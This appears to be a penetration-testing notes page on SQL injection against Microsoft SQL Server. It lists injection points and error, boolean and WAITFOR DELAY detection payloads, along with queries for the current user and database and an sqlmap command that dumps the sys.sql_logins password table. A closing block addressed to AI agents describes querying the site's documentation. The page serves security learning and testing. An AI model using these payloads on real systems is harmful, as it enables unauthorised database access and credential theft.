# MSSQL.md

Microsoft SQL Server is a relational database management system developed by Microsoft.\
Microsoft markets a dozen different editions of Microsoft SQL Server with various functionalities and aims. A list of the versions is available : <https://support.microsoft.com/en-us/help/321185/how-to-determine-the-version-edition-and-update-level-of-sql-server-an>

**MSSQL supports stacked queries.**

### Vulnerable parameters detection

**Injection locations**

In a HTTP request there are a few possible injection points :

* URL parameters
* POST parameters
* Cookie names and values
* Host header and any custom headers

Note that while the entry points above are the most common, any content in an HTTP request can be prone to SQL injection.

**Injection detection**

Detecting vulnerable parameters is most easily done by triggering errors and boolean logic within the application.\
Supplying malformed queries will trigger errors and sending valid queries with various boolean logic statements may trigger different responses from the web server.\
Time based payload can also be used to detect SQL injection in MSSQL.

| Technique                                                                                 | Queries                                                                                                                                                                                                       |
| ----------------------------------------------------------------------------------------- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| <p>Error<br><em>A direct message can be returned or the page may act differently</em></p> | <p><code>x='</code><br><code>x=''</code><br><code>x="</code><br><code>x=""</code><br><code>x=\</code><br><code>x=\\</code><br><code>x='</code><br><code>...</code></p>                                        |
| <p>Boolean Testing<br><em>Page can react differently if true or false</em></p>            | <p><code>x=1 or 1=1 -- true</code><br><code>x=1' or 1=1 -- true</code><br><code>x=1" or 1=1 -- true</code><br><code>x=1 or 1=2 -- false</code><br><code>...</code></p>                                        |
| <p>Time Based<br><em>A delay can be induced by the query execution</em></p>               | <p><code>x=1 WAITFOR DELAY '0:0:5' -- Wait 5 seconds</code><br><code>x=1; WAITFOR DELAY '0:0:5' -- Wait 5 seconds</code><br><code>x=1 WAITFOR TIME '22:42' -- Wait until 22:42</code><br><code>...</code></p> |

**Automated detection**

The detection of vulnerable parameters can be automated, using the `BurpSuite Pro scanner` or `sqlmap` for example.

Note that second order SQL injection, which arises when user-supplied data is first stored by the application and then later incorporated into SQL queries in an unsafe manners, may not be properly detected by automatic tools.

### Databases dumping

| Description                | Queries                                                                                             |
| -------------------------- | --------------------------------------------------------------------------------------------------- |
| Comments                   |                                                                                                     |
| Encoding queries           |                                                                                                     |
| Obfuscating queries        |                                                                                                     |
| Disable logging mechanisms |                                                                                                     |
| MSSQL version              |                                                                                                     |
| Current user               | `SELECT (CAST(SYSTEM_USER AS NVARCHAR(4000)))`                                                      |
| Users and privileges       |                                                                                                     |
| Users' passwords           | <p>Using <code>sqlmap</code>:<br><code>sqlmap -D master -T sys.sql\_logins --dump \[...]</code></p> |
| Databases                  |                                                                                                     |
| Current database           | `SELECT (CAST(DB_NAME() AS NVARCHAR(4000)))`                                                        |
| Tables                     |                                                                                                     |
| Columns                    |                                                                                                     |
| Data                       |                                                                                                     |

***

### References

<https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/> <https://www.asafety.fr/mssql-injection-cheat-sheet> <http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet> <https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.qazeer.io/web-applications/exploitation-sql_injections/mssql.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.